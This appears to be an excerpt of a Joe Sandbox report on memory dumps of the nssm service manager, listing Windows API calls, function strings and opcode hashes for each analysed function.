                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocConfig2ErrorLastProcessQueryService
                                                                                                                                                                                                                                  • String ID: SERVICE_CONFIG_DELAYED_AUTO_START_INFO$SERVICE_DELAYED_AUTO_START_INFO$get_service_startup()
                                                                                                                                                                                                                                  • API String ID: 2527037045-1869567720
                                                                                                                                                                                                                                  • Opcode ID: f19591b993cb43f1995c1099be75d9e8de98aed884dc4773ed2125bc0d1c144d
                                                                                                                                                                                                                                  • Instruction ID: b6987a00ff806b9f8ade995f619d679bc69413a64b293bf4d9fc0d0bd54a8463
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f19591b993cb43f1995c1099be75d9e8de98aed884dc4773ed2125bc0d1c144d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D417B36604A5186EB12DBA6F4143DA73A0F78DBD8F444825FB894BB69DF79C9818700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1575098132-0
                                                                                                                                                                                                                                  • Opcode ID: 6cd52bee18367c545b85d7220c6b2d13b680b74dfb171820461031a1284109b3
                                                                                                                                                                                                                                  • Instruction ID: e3b172306452056b65059ebcbe82d0fd061eace1d3cb461118a0a9ff59566893
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd52bee18367c545b85d7220c6b2d13b680b74dfb171820461031a1284109b3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31183130264045FE6BABA390A57F92391AF8DBC4F4C0525BF1A4F6E6CF3AC9518315
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$Value_snwprintf_s$DeleteErrorLast
                                                                                                                                                                                                                                  • String ID: %s$default
                                                                                                                                                                                                                                  • API String ID: 3208764733-387093873
                                                                                                                                                                                                                                  • Opcode ID: e6dbd48017853acabca27933a65bdebaddf5ba749072e8e22fec4b2415e3d2a4
                                                                                                                                                                                                                                  • Instruction ID: 5f7f2beea9be4c69a321cdad48f50fae9691f88065ff7517c77cd0d0c8d2804a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6dbd48017853acabca27933a65bdebaddf5ba749072e8e22fec4b2415e3d2a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B719171214A4441EB629F63F8407EA63A0B78EBE8F840625BF6A4B7F5DF39C545C701
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                  • String ID: %s$LocalSystem$SERVICE_INTERACTIVE_PROCESS$SERVICE_WIN32_OWN_PROCESS
                                                                                                                                                                                                                                  • API String ID: 3859560861-1492594695
                                                                                                                                                                                                                                  • Opcode ID: 2e2bcc1eb665a014a3c78fbb49d98345907d721bbc6c756e83f96c03c2c4375e
                                                                                                                                                                                                                                  • Instruction ID: 88af7a4f107575e18c2db1790091ff36a0ed326fc09749f86fc6e24241644b35
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e2bcc1eb665a014a3c78fbb49d98345907d721bbc6c756e83f96c03c2c4375e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C517E71604A4581EA62EBB3F8513DA6390FB9DBE8F444125BB5D8B7E6EF39C844C310
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                  • String ID: AppEnvironment
                                                                                                                                                                                                                                  • API String ID: 3859560861-948859433
                                                                                                                                                                                                                                  • Opcode ID: cd8b8b89b766da783b6489ac56d6d9b3cbd00554b9452cb77440047128e38e69
                                                                                                                                                                                                                                  • Instruction ID: be131eb4678f6de48cd3c05b69385e1f8947c19d6c9cdcdac3c2cd7b68017e2e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd8b8b89b766da783b6489ac56d6d9b3cbd00554b9452cb77440047128e38e69
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B417071614B8082EB52EF67B4447DAA391FB8DBE8F140229BB59877F9DF39C4458700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSectionSleep_snwprintf_s$ConditionEnterLeaveObjectServiceSingleStatusTimerVariableWaitWaitable
                                                                                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                                                                                  • API String ID: 4103298498-685833217
                                                                                                                                                                                                                                  • Opcode ID: 8f54a6cb8de27442f100088b9901cdab329cda773342aa4900d8ea18437323a0
                                                                                                                                                                                                                                  • Instruction ID: a0d46281a3d711ef9a7f2056921f83d5478f99d5d1c2d2170c1e27229d65bb19
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f54a6cb8de27442f100088b9901cdab329cda773342aa4900d8ea18437323a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF51AD72A00A85D3EB19CB66E5853DE73A0F388394F400316E76D4B6E4DB3DDA69CB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$AllocHeapSource$DeregisterEnvironmentErrorExpandLastLocalProcessRegisterReportStringsValue
                                                                                                                                                                                                                                  • String ID: ExpandEnvironmentStrings()$expand_environment_string
                                                                                                                                                                                                                                  • API String ID: 834161584-2090451141
                                                                                                                                                                                                                                  • Opcode ID: 84e0d3c87724571db3532b2dffd06979eb6bef45dd852d48cd1134aac741837e
                                                                                                                                                                                                                                  • Instruction ID: 7d4762bfd873c7e71247cc25719a56f181b9c99379dadd46536fe4ac97d71954
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84e0d3c87724571db3532b2dffd06979eb6bef45dd852d48cd1134aac741837e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1313275B0465143FB529BABB8003DA62A1E78DBCCF844529FF8D97769DE3DC9414700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$ConfigErrorLastProcessQueryService$AllocFree
                                                                                                                                                                                                                                  • String ID: QUERY_SERVICE_CONFIG$query_service_config()
                                                                                                                                                                                                                                  • API String ID: 2921672788-976127789
                                                                                                                                                                                                                                  • Opcode ID: 40f986bbe4edd70e1b718b459b2b5680c20a21d92c0b08bf31b907c0fb54466d
                                                                                                                                                                                                                                  • Instruction ID: a343e80583ccd001b5a7f63232f4e5070a7aeb7995e53d710e0b8a2a473a5831
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40f986bbe4edd70e1b718b459b2b5680c20a21d92c0b08bf31b907c0fb54466d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94214C31604A9192EB02ABA7F8443DAA361FB8DBC8F844429FB4D47B79DE7DC9458700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$DeregisterRegisterReport_snwprintf_s
                                                                                                                                                                                                                                  • String ID: %s%s$CreationDisposition$FlagsAndAttributes$ShareMode$get_createfile_parameters()
                                                                                                                                                                                                                                  • API String ID: 3081108292-825329064
                                                                                                                                                                                                                                  • Opcode ID: 11dec7d95bad990dedb2f2ffe0f9be87eedd5a30ca9ca4c8a7a8000d8d86f4e5
                                                                                                                                                                                                                                  • Instruction ID: 0fbf9f1a709479d38be9e5a47ced07cc8c4bd0a801255a208d26b21c87afb989
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11dec7d95bad990dedb2f2ffe0f9be87eedd5a30ca9ca4c8a7a8000d8d86f4e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68617BB121468582E762DB62F840BDA73A4F74D3E8F900316FBA987AE5DB3CC945C700
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: %c%u
                                                                                                                                                                                                                                  • API String ID: 0-883269693
                                                                                                                                                                                                                                  • Opcode ID: 7ba2763f1fc0ab87a6f97b196bf6db22d9a438255d55c60d2e83ee30ed7de1c7
                                                                                                                                                                                                                                  • Instruction ID: b94a462412cafb144c424c601cdc0e93f34a5c9c813dc26ab1d3b1095dcc52d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ba2763f1fc0ab87a6f97b196bf6db22d9a438255d55c60d2e83ee30ed7de1c7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2451FF72214AC496E761DF26F8483EA73A1F3887E8F508329EB5947BB4DB38C045DB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatMessageValue$AllocDefaultLangLocalUser_snwprintf_s
                                                                                                                                                                                                                                  • String ID: <out of memory for error message>$system error %lu
                                                                                                                                                                                                                                  • API String ID: 2253289489-3923297632
                                                                                                                                                                                                                                  • Opcode ID: 34f166d6afbdeda90be673a3b58342017fe89966e178ed2986ab0ca9ebb3f989
                                                                                                                                                                                                                                  • Instruction ID: e8f011b8697511008af2b84cf47705d0478e1745fd62caf74eb6a21411190ae2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34f166d6afbdeda90be673a3b58342017fe89966e178ed2986ab0ca9ebb3f989
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA213E7160474182F762DF66F8407AA63A1FB8C7E4F544238EB69477E4EF3CC9958600
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400209D2
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400209F1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140020A96
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 0000000140020AAD
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140020AF5
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140020B30
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140020B6C
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140020BAC
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0000000140020BBA
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0000000140020BDC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$Infofree$malloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1309074677-0
                                                                                                                                                                                                                                  • Opcode ID: 07256a531fae4609a15dda35150dfbfc3a790e521049a7f02be974b7a27b1107
                                                                                                                                                                                                                                  • Instruction ID: e5b26026f078c1003670bbafd43b066f79f6f8784d59f94250538696047b382f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07256a531fae4609a15dda35150dfbfc3a790e521049a7f02be974b7a27b1107
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B61B63221078086E7269F27A4403D9B6D5F79CBE8F584A19FB5947BF5DB78CD418300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$ErrorLastSource$AllocCloseDeregisterHandleLocalRegisterReportValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 248203913-0
                                                                                                                                                                                                                                  • Opcode ID: 5a5cd966dc8c1ef92b57ba5ac2750f3874a416b98bf3cfce9f74199cc6d4c4a9
                                                                                                                                                                                                                                  • Instruction ID: b1d4973f455e8a63e4e627d9d44e50220905ac5c8fc0dd77f3ced4fb10cb10f5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a5cd966dc8c1ef92b57ba5ac2750f3874a416b98bf3cfce9f74199cc6d4c4a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC4191B26143409BE751DB76F4407EA76A1E78CBC4F404529FB8A87BA9DF3CC9408B40
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: kill_console
                                                                                                                                                                                                                                  • API String ID: 0-1600766264
                                                                                                                                                                                                                                  • Opcode ID: e3a680ac86d12daeef4d791e8b2b7fceaa7fc33ffc48d86cabb77cafe1324b91
                                                                                                                                                                                                                                  • Instruction ID: aea0562dd94faadc3ca81d791a0edf576cd8a85eb4a28bda3d3761081b1b8944
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3a680ac86d12daeef4d791e8b2b7fceaa7fc33ffc48d86cabb77cafe1324b91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83417EB260464083FB55EB66F4003EA73A1E78D7C8F494426FB89877A5DF3DC9868614
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastOpenProcess_snwprintf_s
                                                                                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                                                                                  • API String ID: 1004745324-685833217
                                                                                                                                                                                                                                  • Opcode ID: ed8e1c891ad7a814438d8d533c2b67106cf303cc9ef7952ebafe84ec5ebc1623
                                                                                                                                                                                                                                  • Instruction ID: 80a4aa2c66503d820272e468f297ff043617168015c75b0ef80413312d3bd28c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed8e1c891ad7a814438d8d533c2b67106cf303cc9ef7952ebafe84ec5ebc1623
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66319271214A8592EB25DB66F4017EAB3A1F78CBD4F444226BB9A876A4DF3CC945C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Event$ProcessSource$AllocDeregisterFreeRegisterReport_snwprintf_s
                                                                                                                                                                                                                                  • String ID: 0x%08x$control code$log_service_control()
                                                                                                                                                                                                                                  • API String ID: 4005908332-2089045330
                                                                                                                                                                                                                                  • Opcode ID: 4fa4ef5bf55bf4487f11a2ca277563c0903b2c08f592bad8c664c8e2b71f24e5
                                                                                                                                                                                                                                  • Instruction ID: db7b77d9d2a2484bd9a930f7e5c5034a44d172fd9d4d2405784af6e90b2ca822
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4fa4ef5bf55bf4487f11a2ca277563c0903b2c08f592bad8c664c8e2b71f24e5
